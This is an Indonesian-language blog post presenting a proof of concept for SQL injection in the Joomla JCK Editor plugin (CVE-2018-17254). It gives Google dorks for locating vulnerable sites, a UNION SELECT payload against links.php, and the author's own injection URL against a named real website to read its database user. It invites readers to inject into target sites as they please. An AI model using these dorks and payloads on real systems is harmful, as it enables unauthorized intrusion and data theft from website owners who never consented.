Joomla JCK Editor SQL Injection

Selamat datang, oke kali ini gw bakal bahas Proof of Concept (PoC) Joomla JCK Editor SQL Injection (CVE-2018-17254), yang nanti nya kalian bisa injeksi kode kode sql ke website target sesuka hati kalian. Dah paham lah ya nama nya juga SQLi :v. Oke jadi gw post ini karna barusan liat ada orang ngeposting lagi PoC ini di exploit-db. 

Oke jadi vuln nya ada di :

[site.com]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php

Dan ini buat dork nya :

index of /jckeditor/plugins/jtreelink/
inurl:/plugins/editors/jckeditor/plugins/jtreelink/

Exploit nya :

links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,user(),NULL,NULL,NULL,NULL,NULL--%20aa

Oke seperti biasa kalian dorking dorking di google atau di search engine lain. Terus pilih sakah satu web, dan pastiin kalian liat tempat vuln yang gw taruh di atas itu. Kalian ganti ganti aja URi nya sesuai ama tempat vuln nya itu yaitu di link.php.

Kalau bener di link.php, kurang lebih tampilan nya kaya gini (default) : 

Jadi kira kira tampilan awalnya kaya gitu, sesuain aja sama target lo.

Oke kalau udah nemu target kalian masukin exploit nya, replace link.php url lo pake exploit di atas. Kalo di gw url nya kaya gini:

http://www.casp.asso.fr/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,user(),NULL,NULL,NULL,NULL,NULL--%20aa

Nah karna di param exploit nya kita mangil user() nanti hasil nya kurang lebih bakal ada user database dari website itu. Kalo di gw kaya gini:

Oke kita berhasil inject website itu, kalian bisa ganti untuk print  database(), atau version() sesuka hati kalian. Untuk dios gw belom nemu yang pas buat nge dump di PoC ini karna setiap mau uji coba suka error. Emang gw gajago SQLi sih :D.

Oke jadi segitu ae, semoga bermafaat.